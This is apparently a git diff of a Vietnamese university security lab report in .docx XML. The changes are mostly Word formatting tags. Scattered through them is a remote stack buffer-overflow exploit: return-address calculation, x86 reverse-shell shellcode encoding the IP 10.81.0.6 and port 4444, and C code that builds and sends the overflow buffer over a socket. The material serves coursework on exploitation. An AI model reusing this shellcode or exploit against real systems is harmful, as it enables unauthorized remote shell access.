--- a/Lab2/[NT230.N21.ANTN]-Lab2_20520605.docx
+++ b/Lab2/[NT230.N21.ANTN]-Lab2_20520605.docx
@@ -251,8 +251,13 @@
         <w:t xml:space="preserve">Lớp: </w:t>
       </w:r>
       <w:r>
-        <w:t>NT230.N21.ANTN</w:t>
-      </w:r>
+        <w:t>NT230.N</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>21.ANTN</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -986,6 +991,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563293E5" wp14:editId="7162715E">
             <wp:extent cx="6115050" cy="1376045"/>
@@ -1030,6 +1038,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AA8FFD" wp14:editId="3262994E">
             <wp:extent cx="4099915" cy="777307"/>
@@ -1069,22 +1080,32 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Ta có được return address là 0xbfff284</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Nhưng do là chương trình ta khi thực hiện ta sẽ thực hiện cộng thêm 7 do là trong hàm  sprintf ta thấy được là “Hello :” có 7 ký tự nên ta sẽ cộng thêm 7 thành </w:t>
-      </w:r>
-      <w:r>
-        <w:t>0xbfff28</w:t>
-      </w:r>
-      <w:r>
-        <w:t>B</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t xml:space="preserve">Ta có được return address là </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>0xbfff284</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nhưng do là chương trình ta khi thực hiện ta sẽ thực hiện cộng thêm 7 do là trong </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>hàm  sprintf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ta thấy được là “Hello :” có 7 ký tự nên ta sẽ cộng thêm 7 thành 0xbfff28B</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16CE96DE" wp14:editId="60E59B46">
             <wp:extent cx="6115050" cy="425450"/>
@@ -1157,63 +1178,48 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>66 68 b0 ef             pushw  0xefb0</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Tiếp theo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> ta sẽ thực hiện chèn ip và port nhưng ip là 10.81.0.6 có biến 0 nên ta không thể truyền trực tiếp mà ta cần phải thực hiện xor để lấy kết quả và truyền, cuối cùng clear thanh nhớ bằng xor chính thanh ghi. Và truyền port 4444 thì chỉ cần pushw</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve">66 68 b0 ef             </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>pushw  0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>b9 11 11 11 11          mov    ecx,0x11111111</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
+        <w:t>xefb0</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Tiếp theo ta sẽ thực hiện chèn ip và port nhưng ip là 10.81.0.6 có biến 0 nên ta không thể truyền trực tiếp mà ta cần phải thực hiện xor để lấy kết quả và truyền, cuối cùng clear thanh nhớ bằng xor chính thanh ghi. Và truyền port 4444 thì chỉ cần pushw</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>81 f1 1b 40 11 17       xor    ecx,0x1711401b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>51                      push   ecx</w:t>
+        <w:t>b9 11 11 11 11          mov    ecx,0x11111111</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1228,7 +1234,7 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>31 c9                   xor    ecx,ecx</w:t>
+        <w:t>81 f1 1b 40 11 17       xor    ecx,0x1711401b</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1243,16 +1249,56 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>66 68 11 5c             pushw  0x5c11</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>51                      push   ecx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>31 c9                   xor    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ecx,ecx</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>66 68 11 5c             pushw  0x5c11</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1519,7 +1565,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> shellcode</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1529,7 +1586,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>[]</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2432,6 +2500,7 @@
         </w:rPr>
         <w:t>\x01\xcd\x80</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -2452,6 +2521,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2577,6 +2647,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -2597,6 +2668,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -2753,6 +2825,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -2771,7 +2844,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>[BUF_SIZE];</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>BUF_SIZE];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2814,8 +2898,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> s, i, size;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> s, i, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>size;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2857,8 +2953,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> sockaddr_in remote;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> sockaddr_in </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>remote;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2900,8 +3008,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hostent *host;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> hostent *</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>host;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2956,7 +3076,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (argc != </w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>argc !</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">= </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3185,7 +3327,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3207,6 +3360,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3287,6 +3441,7 @@
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_Hlk130850002"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -3305,7 +3460,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(buffer, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3405,7 +3571,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[33] = 192;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>33] = 192;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3439,7 +3627,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[34] = 168;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>34] = 168;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3472,7 +3682,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[35] = 207;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>35] = 207;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3505,7 +3737,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[36] = 144;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>36] = 144;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3551,7 +3805,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[39] = 17;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>39] = 17;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3584,7 +3860,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// shellcode[40] = 92;</w:t>
+        <w:t xml:space="preserve">// </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>40] = 92;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3642,6 +3940,7 @@
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -3660,7 +3959,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(buffer + </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">buffer + </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3955,8 +4265,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> *)&amp;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>*)&amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4023,6 +4345,7 @@
         </w:rPr>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4041,7 +4364,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">[BUF_SIZE - </w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">BUF_SIZE - </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4159,6 +4493,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4179,6 +4514,7 @@
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4308,6 +4644,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4326,7 +4663,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(stderr, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stderr, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4459,7 +4807,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4481,6 +4840,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4560,6 +4920,7 @@
         </w:rPr>
         <w:t xml:space="preserve">  s = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4578,7 +4939,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(AF_INET, SOCK_STREAM, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AF_INET, SOCK_STREAM, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4709,6 +5081,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -4727,7 +5100,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(stderr, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stderr, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4810,7 +5194,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4832,6 +5227,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4886,7 +5282,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>// state Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
+        <w:t xml:space="preserve">// state </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
